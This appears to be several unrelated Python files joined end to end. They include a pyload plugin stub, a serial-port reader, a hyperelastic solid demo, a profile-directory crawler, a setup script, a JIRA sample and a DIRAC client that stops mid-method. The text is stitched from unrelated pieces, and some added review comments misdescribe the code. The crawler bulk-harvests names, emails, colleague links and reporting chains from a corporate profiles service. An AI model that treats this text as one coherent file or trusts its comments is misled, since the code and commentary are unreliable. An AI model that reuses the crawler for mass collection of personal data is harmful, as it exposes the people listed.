from pyload.plugin.internal.DeadCrypter import DeadCrypter


class FiredriveCom(DeadCrypter):
    """Dead-plugin stub for the defunct Firedrive.com / Putlocker.com
    folder decrypter; DeadCrypter supplies the 'service gone' behavior."""
    # NOTE(review): pyload plugin metadata is usually spelled with trailing
    # dunders (e.g. `__name__`, `__pattern__`).  These single-trailing-underscore
    # names are mangled to `_FiredriveCom__name` etc. -- confirm the plugin
    # loader really expects this spelling before changing it.
    __name    = "FiredriveCom"
    __type    = "crypter"
    __version = "0.03"

    __pattern = r'https?://(?:www\.)?(firedrive|putlocker)\.com/share/.+'
    __config  = []  #@TODO: Remove in 0.4.10

    __description = """Firedrive.com folder decrypter plugin"""
    __license     = "GPLv3"
    __authors     = [("Walter Purcaro", "vuolter@gmail.com")]

import queue
import logging
import platform
import threading

import datetime as dt
import serial
import serial.threaded
import serial_device

from .or_event import OrEvent

# Module-level logger for connection lifecycle messages.
logger = logging.getLogger(__name__)


# Flag to indicate whether queues should be polled (see `request` below:
# polling was observed to give faster response processing on Windows).
# XXX Note that polling performance may vary by platform.
POLL_QUEUES = (platform.system() == 'Windows')


class EventProtocol(serial.threaded.Protocol):
    """serial.threaded protocol exposing connection state as threading events.

    ``connected`` is set while a transport is attached; ``disconnected`` is
    set once the port is closed or the reader loop terminates.  Subclasses
    must implement ``data_received``.
    """
    def __init__(self):
        self.transport = None  # set in connection_made; used for writing
        self.connected = threading.Event()
        self.disconnected = threading.Event()
        self.port = None  # name of the underlying serial port (for logging)

    def connection_made(self, transport):
        """Called when reader thread is started"""
        self.port = transport.serial.port
        logger.debug('connection_made: `%s` `%s`', self.port, transport)
        self.transport = transport
        self.connected.set()
        self.disconnected.clear()

    def data_received(self, data):
        """Called with snippets received from the serial port"""
        # Abstract: subclasses must override to consume incoming bytes.
        raise NotImplementedError

    def connection_lost(self, exception):
        """\
        Called when the serial port is closed or the reader loop terminated
        otherwise.
        """
        # An Exception instance signals an abnormal loss; None a clean close.
        if isinstance(exception, Exception):
            logger.debug('Connection to port `%s` lost: %s', self.port,
                         exception)
        else:
            logger.debug('Connection to port `%s` closed', self.port)
        self.connected.clear()
        self.disconnected.set()


class KeepAliveReader(threading.Thread):
    '''
    Keep a serial connection alive (as much as possible).

    Parameters
    ----------
    protocol_class : serial.threaded.Protocol subclass
        Protocol class instantiated by ``serial.threaded.ReaderThread`` for
        each (re)connection, e.g. ``EventProtocol``.
    comport : str
        Name of com port to connect to.
    default_timeout_s : float, optional
        Default time to wait for serial operation (e.g., connect).

        By default, block (i.e., no time out).
    **kwargs
        Keyword arguments passed to ``serial_for_url`` function, e.g.,
        ``baudrate``, etc.
    '''
    def __init__(self, protocol_class, comport, **kwargs):
        super(KeepAliveReader, self).__init__()
        self.daemon = True
        self.protocol_class = protocol_class
        self.comport = comport
        self.kwargs = kwargs
        self.protocol = None
        # NOTE: `self.kwargs` aliases `kwargs`, so this pop also removes
        # `default_timeout_s` from the dict later passed to `serial_for_url`.
        self.default_timeout_s = kwargs.pop('default_timeout_s', None)

        # Event to indicate serial connection has been established.
        self.connected = threading.Event()
        # Event to request a break from the run loop.
        self.close_request = threading.Event()
        # Event to indicate thread has been closed.
        self.closed = threading.Event()
        # Event to indicate an exception has occurred.
        self.error = threading.Event()
        # Event to indicate that the thread has connected to the specified port
        # **at least once**.
        self.has_connected = threading.Event()

    @property
    def alive(self):
        # The thread counts as alive until `run()` sets `closed`.
        return not self.closed.is_set()

    def run(self):
        """Main loop: connect to the port and reconnect on loss until a
        close is requested; failures are published via `self.error`."""
        # Verify requested serial port is available.
        try:
            if self.comport not in (serial_device
                                    .comports(only_available=True).index):
                raise NameError('Port `%s` not available.  Available ports: '
                                '`%s`' % (self.comport,
                                          ', '.join(serial_device.comports()
                                                    .index)))
        except NameError as exception:
            self.error.exception = exception
            self.error.set()
            self.closed.set()
            return

        while True:
            # Wait for requested serial port to become available.
            while self.comport not in (serial_device
                                       .comports(only_available=True).index):
                # Assume serial port was disconnected temporarily.  Wait and
                # periodically check again.
                self.close_request.wait(2)
                if self.close_request.is_set():
                    # No connection is open, so nothing to close.  Just quit.
                    self.closed.set()
                    return
            try:
                # Try to open serial device and monitor connection status.
                logger.debug('Open `%s` and monitor connection status',
                             self.comport)
                device = serial.serial_for_url(self.comport, **self.kwargs)
            except serial.SerialException as exception:
                self.error.exception = exception
                self.error.set()
                self.closed.set()
                return
            except Exception as exception:
                self.error.exception = exception
                self.error.set()
                self.closed.set()
                return
            else:
                with serial.threaded.ReaderThread(device, self
                                                  .protocol_class) as protocol:
                    self.protocol = protocol

                    connected_event = OrEvent(protocol.connected,
                                              self.close_request)
                    disconnected_event = OrEvent(protocol.disconnected,
                                                 self.close_request)

                    # Wait for connection.  Only apply the timeout on the
                    # first-ever connection attempt.
                    connected_event.wait(None if self.has_connected.is_set()
                                         else self.default_timeout_s)
                    if self.close_request.is_set():
                        # Quit run loop.  Serial connection will be closed by
                        # `ReaderThread` context manager.
                        self.closed.set()
                        return
                    self.connected.set()
                    self.has_connected.set()
                    # Wait for disconnection.
                    disconnected_event.wait()
                    if self.close_request.is_set():
                        # Quit run loop.
                        self.closed.set()
                        return
                    self.connected.clear()
                    # Loop to try to reconnect to serial device.

    def write(self, data, timeout_s=None):
        '''
        Write to serial port.

        Waits for serial connection to be established before writing.

        Parameters
        ----------
        data : str or bytes
            Data to write to serial port.
        timeout_s : float, optional
            Maximum number of seconds to wait for serial connection to be
            established.

            By default, block until serial connection is ready.
        '''
        self.connected.wait(timeout_s)
        self.protocol.transport.write(data)

    def request(self, response_queue, payload, timeout_s=None,
                poll=POLL_QUEUES):
        '''
        Send payload to the serial device and wait for a response.

        Waits for the serial connection to be established first, then
        delegates to the module-level :func:`request`.

        Parameters
        ----------
        response_queue : Queue.Queue
            Queue to wait for response on.
        payload : str or bytes
            Payload to send.
        timeout_s : float, optional
            Maximum time to wait (in seconds) for response.

            By default, block until response is ready.
        poll : bool, optional
            If ``True``, poll response queue in a busy loop until response is
            ready (or timeout occurs).

            Polling is much more processor intensive, but (at least on Windows)
            results in faster response processing.  On Windows, polling is
            enabled by default.
        '''
        self.connected.wait(timeout_s)
        return request(self, response_queue, payload, timeout_s=timeout_s,
                       poll=poll)

    def close(self):
        # Ask the run loop to exit; `run()` sets `closed` and the
        # `ReaderThread` context manager closes the port.
        self.close_request.set()

    # - -  context manager, returns protocol

    def __enter__(self):
        """\
        Enter context handler. May raise RuntimeError in case the connection
        could not be created.
        """
        self.start()
        # Wait for protocol to connect (or for the thread to give up).
        event = OrEvent(self.connected, self.closed)
        event.wait(self.default_timeout_s)
        return self

    def __exit__(self, *args):
        """Leave context: close port"""
        self.close()
        self.closed.wait()


def request(device, response_queue, payload, timeout_s=None, poll=POLL_QUEUES):
    '''
    Send payload to serial device and wait for response.

    Parameters
    ----------
    device : serial.Serial
        Serial instance.
    response_queue : Queue.Queue
        Queue to wait for response on.
    payload : str or bytes
        Payload to send.
    timeout_s : float, optional
        Maximum time to wait (in seconds) for response.

        By default, block until response is ready.
    poll : bool, optional
        If ``True``, poll response queue in a busy loop until response is
        ready (or timeout occurs).

        Polling is much more processor intensive, but (at least on Windows)
        results in faster response processing.  On Windows, polling is
        enabled by default.

    Raises
    ------
    queue.Empty
        If ``timeout_s`` elapses before a response arrives.
    '''
    device.write(payload)
    if poll:
        # Polling enabled.  Wait for response in busy loop.
        start = dt.datetime.now()
        while not response_queue.qsize():
            # BUG FIX: the original compared elapsed seconds against
            # `timeout_s` unconditionally, raising TypeError when
            # `timeout_s` is None (the documented "block forever" default).
            if (timeout_s is not None and
                    (dt.datetime.now() - start).total_seconds() > timeout_s):
                raise queue.Empty('No response received.')
        return response_queue.get()
    else:
        # Polling disabled.  Use blocking `Queue.get()` method to wait for
        # response.
        return response_queue.get(timeout=timeout_s)

__author__ = "Harish Narayanan"
__copyright__ = "Copyright (C) 2009 Simula Research Laboratory and %s" % __author__
__license__  = "GNU GPL Version 3 or any later version"

from cbc.twist import *
from sys import argv
""" DEMO - Twisting of a hyperelastic cube """

class Twist(StaticHyperelasticity):
    """ Definition of the hyperelastic problem """
    def mesh(self):
        n = 8
        return UnitCubeMesh(n, n, n)

    # Setting up dirichlet conditions and boundaries
    def dirichlet_values(self):
        clamp = Expression(("0.0", "0.0", "0.0"))
        twist = Expression(("0.0",
                            "y0 + (x[1] - y0) * cos(theta) - (x[2] - z0) * sin(theta) - x[1]",
                            "z0 + (x[1] - y0) * sin(theta) + (x[2] - z0) * cos(theta) - x[2]"),
                           y0=0.5, z0=0.5, theta=pi/6)
        return [clamp, twist]

    def dirichlet_boundaries(self):
        left = "x[0] == 0.0"
        right = "x[0] == 1.0"
        return [left, right]


    # List of material models
    def material_model(self):
        # Material parameters can either be numbers or spatially
        # varying fields. For example,
        mu       = 3.8461
        lmbda    = Expression("x[0]*5.8 + (1 - x[0])*5.7")
        C10 = 0.171; C01 = 4.89e-3; C20 = -2.4e-4; C30 = 5.e-4
        delka = 1.0/sqrt(2.0)
        M = Constant((0.0,1.0,0.0))
        k1 = 1e2; k2 = 1e1


        materials = []
        materials.append(MooneyRivlin({'C1':mu/2, 'C2':mu/2, 'bulk':lmbda}))
        materials.append(StVenantKirchhoff({'mu':mu, 'bulk':lmbda}))
        materials.append(neoHookean({'half_nkT':mu, 'bulk':lmbda}))
        materials.append(Isihara({'C10':C10,'C01':C01,'C20':C20,'bulk':lmbda}))
        materials.append(Biderman({'C10':C10,'C01':C01,'C20':C20,'C30':C30,'bulk':lmbda}))
        materials.append(AnisoTest({'mu1':mu,'mu2':2*mu,'M':M,'bulk':lmbda}))
        materials.append(GasserHolzapfelOgden({'mu':mu,'k1':k1,'k2':k2,'M':M,'bulk':lmbda}))
        materials.append(Ogden({'alpha1':1.3,'alpha2':5.0,'alpha3':-2.0,\
                                'mu1':6.3e5,'mu2':0.012e5,'mu3':-0.1e5}))
        
        try:
            index = int(argv[1])
        except:
            index = 2
        print str(materials[index])
        return materials[index]

    def name_method(self, method):
        self.method = method

    def __str__(self):
        return "A hyperelastic cube twisted by 30 degrees solved by " + self.method



# Set up the problem with the displacement-based formulation label
# (used only in the banner printed below).

twist = Twist()
twist.name_method("DISPLACEMENT BASED FORMULATION")


# Print the problem description, then solve (Python 2 print statement).
print twist
twist.solve()

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# dépendances
import requests
import xml.dom.minidom
import sys
import signal
import os
import getopt
from queue import Queue
from threading import Thread
import time

class SetQueue(Queue):
    """A Queue that silently drops items it has already accepted once.

    Every enqueued item is remembered in ``all_items`` forever, so an item
    can enter the queue at most once over the queue's lifetime.
    """

    def _init(self, maxsize):
        # Let Queue build its storage, then add the seen-item tracker.
        Queue._init(self, maxsize) 
        self.all_items = set()

    def _put(self, item):
        # Guard clause: drop anything we have already seen.
        if item in self.all_items:
            return
        self.all_items.add(item)
        Queue._put(self, item)

def signal_handler(signal, frame):
    """SIGINT handler: announce the interrupt and exit with status 0."""
    print('You pressed Ctrl+C!')
    sys.exit(0)

def usage():
    """Print command-line usage.

    BUG FIX: the original concatenated the program name directly to "-h"
    with no separating space, printing e.g. ``script.py-h --help ...``.
    """
    print ("usage : " + sys.argv[0] + " -h --help -s --server someurl.com -u --user login -p --password password")

def getAtomFeed(url, login, pwd):
    """Fetch ``http://<url>`` with basic auth and return the parsed DOM.

    Retries the HTTP request up to MAX_TRY times before giving up.

    Raises
    ------
    RuntimeError
        If every request attempt fails, or the response is not valid XML.
    """
    MAX_TRY = 10
    essai = 0

    # get atom document (retry on any request failure)
    while essai < MAX_TRY:
        try:
            r = requests.get('http://' + url, auth=(login, pwd), timeout=10)
        except Exception:
            essai += 1
            continue
        break
    else:
        # BUG FIX: `raise ('...')` raised a TypeError because a plain string
        # is not an exception; use a real exception type.
        raise RuntimeError('Erreur lors de la requête')

    # parse atom document
    try:
        dom = xml.dom.minidom.parseString(r.text)
    except Exception:
        raise RuntimeError('Erreur lors du parsing du document Atom')

    return dom

def getManagerInfo(atomFeed):
	try:
		entries = atomFeed.getElementsByTagName('entry')[1]
	except:
		return None
	try:
		managerId = entries.getElementsByTagName('snx:userid')[0]
		return managerId.firstChild.data
	except:
		return None

def buildUrlSearchList(server, login, pwd, q):
    """Enqueue profile-search URLs for every letter a-z, paginated at 250.

    For each letter the first page URL is enqueued; when the server reports
    more than 250 results, explicit ``&page=N`` URLs are enqueued instead.
    """
    for letter in 'abcdefghijklmnopqrstuvwxyz':
        url = server + '/profiles/atom/search.do?search=' + letter + '*&ps=250'
        dom = getAtomFeed(url, login, pwd)
        total_node = dom.getElementsByTagName('opensearch:totalResults')[0]
        total = int(total_node.firstChild.data)
        if total > 250:
            page_count = int(float(total) / 250) + 1
            for page in range(1, page_count):
                q.put(url + "&page=" + str(page))
        else:
            q.put(url)

def getUserIdsWorker(login, pwd, qin, qout):
    """Worker: consume search URLs from qin, emit snx:userid values to qout.

    A None sentinel on qin stops the worker.  Feeds that cannot be fetched
    are skipped.
    """
    while True:
        url = qin.get()
        # Idiom fix: identity comparison for the None sentinel.
        if url is None:
            break
        qin.task_done()
        try:
            dom = getAtomFeed(url, login, pwd)
        except Exception:
            continue
        # Unused enumerate() index removed; iterate the nodes directly.
        for node in dom.getElementsByTagName('snx:userid'):
            qout.put(node.firstChild.data)


def getRelationsWorker(server, login, pwd, qin, qout, getManager, qmgmt):
    """Worker: fetch colleague connections for each userid from qin.

    For every connection entry, pushes the author's info dict, the
    contributor's info dict, and a CSV relation row onto qout.  When
    getManager is true, also pushes "userid,managerid" rows onto qmgmt.
    A None sentinel on qin stops the worker.
    """
    while True:
        userid = qin.get()
        # Idiom fix: identity comparison for the None sentinel.
        if userid is None:
            break
        qin.task_done()
        url = server + '/profiles/atom/connections.do?userid=' + userid + '&connectionType=colleague&ps=250'
        try:
            dom = getAtomFeed(url, login, pwd)
        except Exception:
            continue
        feed = dom.firstChild
        for entry in feed.getElementsByTagName('entry'):
            # Relation date: first 10 chars (YYYY-MM-DD) of <updated>.
            dateRelation = entry.getElementsByTagName('updated')[0].firstChild.data[:10]

            # Author: name/email are optional, userid is required.
            author = entry.getElementsByTagName('author')[0]
            authorName = _optionalText(author, 'name')
            authorEMail = _optionalText(author, 'email')
            authorUserId = author.getElementsByTagName('snx:userid')[0].firstChild.data

            # Contributor: same shape as author.
            contributor = entry.getElementsByTagName('contributor')[0]
            contribName = _optionalText(contributor, 'name')
            contribEMail = _optionalText(contributor, 'email')
            contribUserId = contributor.getElementsByTagName('snx:userid')[0].firstChild.data

            # build dict payloads and the CSV relation row
            authorInfo = { "userid" : authorUserId, "name" : authorName, "email" : authorEMail }
            contribInfo = { "userid" : contribUserId, "name" : contribName, "email" : contribEMail }
            relation = "\"" + authorUserId + "\",\"" + contribUserId + "\",\"<(" + str(dateRelation) + ",Infinity)>\""
            qout.put(authorInfo)
            qout.put(contribInfo)
            qout.put(relation)

        # get manager
        if getManager == True:
            url = server + "/profiles/atom/reportingChain.do?userid=" + userid
            rc = getAtomFeed(url, login, pwd)
            managerId = getManagerInfo(rc)
            if managerId is not None:
                reportingChain = str(userid) + "," + str(managerId)
                qmgmt.put(reportingChain)


def _optionalText(parent, tag):
    """Text of the first <tag> child of parent, or "" if absent or empty."""
    try:
        return parent.getElementsByTagName(tag)[0].firstChild.data
    except (IndexError, AttributeError):
        return ""
			

def printStatusThread(q0, q1, q2, q3):
    """Status thread: redraw one console line with queue sizes, forever.

    (Removed the unused local ``strtime`` the original assigned and never
    read.)
    """
    while True:
        # '\r' + erase-line escape keeps the output on a single updating line.
        sys.stdout.write('\r\x1b[K')
        sys.stdout.write("urls:" + str(q0.qsize()) + " | ")
        sys.stdout.write("userids:" + str(q1.qsize()) + " | ")
        sys.stdout.write("user infos:" + str(q2.qsize()) + " | ")
        sys.stdout.write("manager infos:" + str(q3.qsize()))
        sys.stdout.flush()
        time.sleep(1)

def writeFileThread(usersFilename, relationsFilename, qin):
    """Drain user dicts and relation strings from qin into two CSV files.

    dict payloads become de-duplicated rows in <usersFilename>.csv; str
    payloads become rows in <relationsFilename>.csv.  A None payload
    flushes and closes both files and stops the thread.
    """
    # file for user details
    u = open(usersFilename + ".csv", "w")
    u.write("Id,Label,eMail\n")
    # file for relations
    r = open(relationsFilename + ".csv", "w")
    r.write("Source,Target,Time Interval\n")

    # Perf fix: a set gives O(1) membership tests; the original scanned a
    # list, which is O(n) per user row.
    doneUsers = set()
    while True:
        data = qin.get()
        if data is None:
            u.flush()
            r.flush()
            u.close()
            r.close()
            break
        # write data
        if isinstance(data, dict):
            row = str(data["userid"]) + ',' + str(data["name"]) + ',' + str(data["email"])
            if row not in doneUsers:
                u.write(row + "\n")
                doneUsers.add(row)
        elif isinstance(data, str):
            r.write(str(data) + "\n")
        qin.task_done()

def writeManagerFileThread(managerFilename, qin):
    """Drain "userid,managerid" rows from qin into <managerFilename>.csv.

    A None payload stops the thread.  BUG FIX: the original never closed
    (or flushed) the file, so buffered rows could be lost when the daemon
    thread was killed; the `with` block guarantees close on exit.
    """
    with open(managerFilename + ".csv", "w") as m:
        m.write("Source,Target\n")
        while True:
            data = qin.get()
            if data is None:
                break
            m.write(str(data) + "\n")
            qin.task_done()
		

def main(argv):
	"""Crawl a Connections-style profiles service and dump CSV files.

	argv : command-line arguments (program name excluded); see usage().
	"""
	# global configuration and bounded work queues
	serverUrl = ""
	login = ""
	pwd = ""
	getManager = False
	urlQueue = SetQueue(maxsize=5000)
	userIdsQueue = SetQueue(maxsize=5000)
	userInfosQueue = Queue(maxsize=5000)
	userManagerQueue = Queue(maxsize=5000)

	# signal handler
	signal.signal(signal.SIGINT, signal_handler)

	# retrieve arguments
	try:
		opts, args = getopt.getopt(argv, "hs:u:p:m", ["help", "server=", "user=", "password=", "manager"])
		for opt, arg in opts:
			if opt in ("-h", "--help"):
				usage()
				sys.exit()
			elif opt in ("-s", "--server"):
				serverUrl = arg
			elif opt in ("-u", "--user"):
				login = arg
			elif opt in ("-p", "--password"):
				pwd = arg
			elif opt in ("-m", "--manager"):
				getManager = True
	except:
		usage()
		sys.exit()

	# threading get userinfo worker
	userIdWorker = []
	for i in range(10):
		w1 = Thread(target=getUserIdsWorker, args=(login, pwd, urlQueue, userIdsQueue,))
		w1.setDaemon(True)
		w1.start()
		userIdWorker.append(w1)

	# threading get relations worker
	userInfoWorker = []
	for i in range(20):
		w2 = Thread(target=getRelationsWorker, args=(serverUrl, login, pwd, userIdsQueue, userInfosQueue, getManager, userManagerQueue,))
		w2.setDaemon(True)
		w2.start()
		userInfoWorker.append(w2)

	# thread to print size of queue
	w3 = Thread(target=printStatusThread, args=(urlQueue, userIdsQueue, userInfosQueue, userManagerQueue,))
	w3.setDaemon(True)
	w3.start()

	# thread to write files
	w4 = Thread(target=writeFileThread, args=("users", "relations", userInfosQueue,))
	w4.setDaemon(True)
	w4.start()

	if getManager == True:
		w5 = Thread(target=writeManagerFileThread, args=("manager", userManagerQueue,))
		w5.setDaemon(True)
		w5.start()

	# build Queue url list (retried: buildUrlSearchList hits the network)
	MAX_TRY = 10
	essai = 0
	while essai < MAX_TRY:
		try:
			buildUrlSearchList(serverUrl, login, pwd, urlQueue)
		except KeyboardInterrupt:
			break
		except:
			essai += 1
			continue
		break

	# NOTE(review): busy-wait until all queues drain; burns a full CPU core.
	while not (urlQueue.empty() and userIdsQueue.empty() and userInfosQueue.empty()):
		pass

	print ("end threads")
	# None sentinels ask the workers to stop.
	urlQueue.put(None)
	userIdsQueue.put(None)
	userInfosQueue.put(None)

	# end of workers
	for i in userIdWorker:
		i.join()
	for i in userInfoWorker:
		i.join()

	time.sleep(5)

	sys.exit(0)


if __name__ == '__main__':
	main(sys.argv[1:])


#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# pkpgcounter : a generic Page Description Language parser
#
# (c) 2003-2009 Jerome Alet <alet@librelogiciel.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
# $Id$
#
#

import sys
import glob
import os
import shutil
# Fail early with a helpful message when distutils is missing.
try :
    from distutils.core import setup
except ImportError as msg :
    sys.stderr.write("%s\n" % msg)
    sys.stderr.write("You need the DistUtils Python module.\nunder Debian, you may have to install the python-dev package.\nOf course, YMMV.\n")
    sys.exit(-1)

# PIL is a hard requirement; abort the install if it is absent.
try :
    from PIL import Image
except ImportError :
    sys.stderr.write("You need the Python Imaging Library (aka PIL).\nYou can grab it from http://www.pythonware.com\n")
    sys.exit(-1)

# Make the in-tree package importable so its version metadata can be read.
sys.path.insert(0, "pkpgpdls")
from pkpgpdls.version import __version__, __doc__

# Collect compiled gettext catalogs: po/<lang>/*.mo ->
# share/locale/<lang>/LC_MESSAGES.
data_files = []
mofiles = glob.glob(os.sep.join(["po", "*", "*.mo"]))
for mofile in mofiles :
    lang = mofile.split(os.sep)[1]
    directory = os.sep.join(["share", "locale", lang, "LC_MESSAGES"])
    data_files.append((directory, [ mofile ]))

# Documentation files (ChangeLog only when present in the tree).
docdir = "share/doc/pkpgcounter"
docfiles = ["README", "COPYING", "BUGS", "CREDITS", "AUTHORS", "TODO"]
data_files.append((docdir, docfiles))

if os.path.exists("ChangeLog") :
    data_files.append((docdir, ["ChangeLog"]))

# Manual pages.
directory = os.sep.join(["share", "man", "man1"])
manpages = glob.glob(os.sep.join(["man", "*.1"]))
data_files.append((directory, manpages))

setup(name = "pkpgcounter", version = __version__,
      license = "GNU GPL",
      description = __doc__,
      author = "Jerome Alet",
      author_email = "alet@librelogiciel.com",
      url = "http://www.pykota.com/software/pkpgcounter/",
      packages = [ "pkpgpdls" ],
      scripts = [ "bin/pkpgcounter" ],
      data_files = data_files)


#!/usr/bin/env python
"""This utility script was adopted from StackExchange:
http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
Adopted for use with arduino_GC connection project
"""

import sys
import glob
import serial


def serial_ports():
    """ Lists serial port names

        :raises EnvironmentError:
            On unsupported or unknown platforms
        :returns:
            A list of the serial ports available on the system
    """
    if sys.platform.startswith('win'):
        ports = ['COM%s' % (i + 1) for i in range(256)]
    elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
        # this excludes your current terminal "/dev/tty"
        # BUG FIX: Linux serial devices are named /dev/tty* (ttyUSB0, ttyS0,
        # ttyACM0, ...); the original globbed '/dev/cu[A-Za-z]*', which is
        # the macOS naming scheme and matches nothing on Linux.
        ports = glob.glob('/dev/tty[A-Za-z]*')
    elif sys.platform.startswith('darwin'):
        ports = glob.glob('/dev/cu.*')
    else:
        raise EnvironmentError('Unsupported platform')

    # Keep only the ports that can actually be opened.
    result = []
    for port in ports:
        try:
            s = serial.Serial(port)
            s.close()
            result.append(port)
        except (OSError, serial.SerialException):
            pass
    return result


# Manual check: enumerate and print the openable serial ports.
if __name__ == '__main__':
    print(serial_ports())

def _setup_pkgresources():
    # App-bundle bootstrap (RESOURCEPATH is read from the environment --
    # presumably set by a py2app-style launcher; confirm): point
    # pkg_resources' egg-extraction cache at a per-application directory
    # under ~/Library/Caches.
    import pkg_resources
    import os
    import plistlib

    # NOTE(review): plistlib.readPlist was deprecated in Python 3.4 and
    # removed in 3.9 -- migrate to plistlib.load if this must run there.
    pl = plistlib.readPlist(os.path.join(
        os.path.dirname(os.getenv('RESOURCEPATH')), "Info.plist"))
    # Prefer the bundle identifier; fall back to the display name.
    appname = pl.get('CFBundleIdentifier')
    if appname is None:
        appname = pl['CFBundleDisplayName']
    path = os.path.expanduser('~/Library/Caches/%s/python-eggs' % (appname,))
    pkg_resources.set_extraction_path(path)


_setup_pkgresources()

#!/usr/bin/env python
# sample module 
from jira.client import JIRA

def main():
    # Create a client with default options and print every project key
    # (Python 2 print statements).
    jira = JIRA()
    # NOTE(review): this second JIRA(...) instance is created and
    # immediately discarded -- confirm whether it was meant to be assigned
    # to `jira` instead of the default-constructed client above.
    JIRA(options={'server': 'http://localhost:8100'})
    projects = jira.projects()
    print projects
    for project in projects:
        print project.key

# Standard boilerplate to call the main() function. 
if __name__ == '__main__':
    main()
""" Class that contains client access to the transformation DB handler. """

__RCSID__ = "$Id$"

import types

from DIRAC                                                  import S_OK, S_ERROR, gLogger
from DIRAC.Core.Base.Client                                 import Client
from DIRAC.Core.Utilities.List                              import breakListIntoChunks
from DIRAC.Resources.Catalog.FileCatalogueBase              import FileCatalogueBase
from DIRAC.ConfigurationSystem.Client.Helpers.Operations    import Operations

# Module-level placeholders, initialised to None here; presumably assigned
# elsewhere in this module -- TODO confirm before removing.
rpc = None
url = None

class TransformationClient( Client, FileCatalogueBase ):

  """ Exposes the functionality available in the DIRAC/TransformationHandler

      This inherits the DIRAC base Client for direct execution of server functionality.
      The following methods are available (although not visible here).

      Transformation (table) manipulation

          deleteTransformation(transName)
          getTransformationParameters(transName,paramNames)
          getTransformationWithStatus(status)
          setTransformationParameter(transName,paramName,paramValue)
          deleteTransformationParameter(transName,paramName)

      TransformationFiles table manipulation

          addFilesToTransformation(transName,lfns)
          addTaskForTransformation(transName,lfns=[],se='Unknown')
          getTransformationStats(transName)

      TransformationTasks table manipulation

          setTaskStatus(transName, taskID, status)
          setTaskStatusAndWmsID(transName, taskID, status, taskWmsID)
          getTransformationTaskStats(transName)
          deleteTasks(transName, taskMin, taskMax)
          extendTransformation( transName, nTasks)
          getTasksToSubmit(transName,numTasks,site='')

      TransformationLogging table manipulation

          getTransformationLogging(transName)

      File/directory manipulation methods (the remainder of the interface can be found below)

          getFileSummary(lfns)
          exists(lfns)

      Web monitoring tools

          getDistinctAttributeValues(attribute, selectDict)
          getTransformationStatusCounters()
          getTransformationSummary()
          getTransformationSummaryWeb(selectDict, sortList, startItem, maxItems)
  """

  def __init__( self, **kwargs ):
    """ Set up the base Client, read the maximum file reset counter from the
        Operations helper, and point the client at the TransformationManager.
    """
    Client.__init__( self, **kwargs )
    opsH = Operations()
    self.maxResetCounter = opsH.getValue( 'Productions/ProductionFilesMaxResetCounter', 10 )

    self.setServer( 'Transformation/TransformationManager' )

  def setServer( self, url ):
    """ Record the URL of the service this client talks to """
    self.serverURL = url

  def getCounters( self, table, attrList, condDict, older = None, newer = None, timeStamp = None,
                   rpc = '', url = '' ):
    """ Count the entries of the given table grouped by attrList """
    rpcClient = self._getRPC( rpc = rpc, url = url )
    return rpcClient.getCounters( table, attrList, condDict, older, newer, timeStamp )

  def addTransformation( self, transName, description, longDescription, transType, plugin, agentType, fileMask,
                         transformationGroup = 'General',
                         groupSize = 1,
                         inheritedFrom = 0,
                         body = '',
                         maxTasks = 0,
                         eventsPerTask = 0,
                         addFiles = True,
                         rpc = '', url = '', timeout = 1800 ):
    """ add a new transformation
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.addTransformation( transName, description, longDescription, transType, plugin,
                                        agentType, fileMask, transformationGroup, groupSize, inheritedFrom,
                                        body, maxTasks, eventsPerTask, addFiles )

  def getTransformations( self, condDict = {}, older = None, newer = None, timeStamp = 'CreationDate',
                          orderAttribute = None, limit = 100, extraParams = False, rpc = '', url = '', timeout = None ):
    """ gets all the transformations in the system, incrementally. "limit" here is just used to determine the offset.
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )

    transformations = []
    # getting transformations - incrementally, until a page shorter than "limit" is returned
    offsetToApply = 0
    while True:
      res = rpcClient.getTransformations( condDict, older, newer, timeStamp, orderAttribute, limit,
                                          extraParams, offsetToApply )
      if not res['OK']:
        return res
      else:
        gLogger.verbose( "Result for limit %d, offset %d: %d" % ( limit, offsetToApply, len( res['Value'] ) ) )
        if res['Value']:
          transformations = transformations + res['Value']
          offsetToApply += limit
        if len( res['Value'] ) < limit:
          break
    return S_OK( transformations )

  def getTransformation( self, transName, extraParams = False, rpc = '', url = '', timeout = None ):
    """ gets a single transformation, optionally with its extra parameters """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.getTransformation( transName, extraParams )

  def getTransformationFiles( self, condDict = {}, older = None, newer = None, timeStamp = 'LastUpdate',
                              orderAttribute = None, limit = 10000, rpc = '', url = '', timeout = 1800 ):
    """ gets all the transformation files for a transformation, incrementally.
        "limit" here is just used to determine the offset.
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    transformationFiles = []
    # getting transformationFiles - incrementally
    offsetToApply = 0
    while True:
      res = rpcClient.getTransformationFiles( condDict, older, newer, timeStamp, orderAttribute, limit, offsetToApply )
      if not res['OK']:
        return res
      else:
        gLogger.verbose( "Result for limit %d, offset %d: %d" % ( limit, offsetToApply, len( res['Value'] ) ) )
        if res['Value']:
          transformationFiles = transformationFiles + res['Value']
          offsetToApply += limit
        if len( res['Value'] ) < limit:
          break
    return S_OK( transformationFiles )


  def getTransformationTasks( self, condDict = {}, older = None, newer = None, timeStamp = 'CreationTime',
                              orderAttribute = None, limit = 10000, inputVector = False, rpc = '',
                              url = '', timeout = None ):
    """ gets all the transformation tasks for a transformation, incrementally.
        "limit" here is just used to determine the offset.
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    transformationTasks = []
    # getting transformationTasks - incrementally
    offsetToApply = 0
    while True:
      res = rpcClient.getTransformationTasks( condDict, older, newer, timeStamp, orderAttribute, limit,
                                              inputVector, offsetToApply )
      if not res['OK']:
        return res
      else:
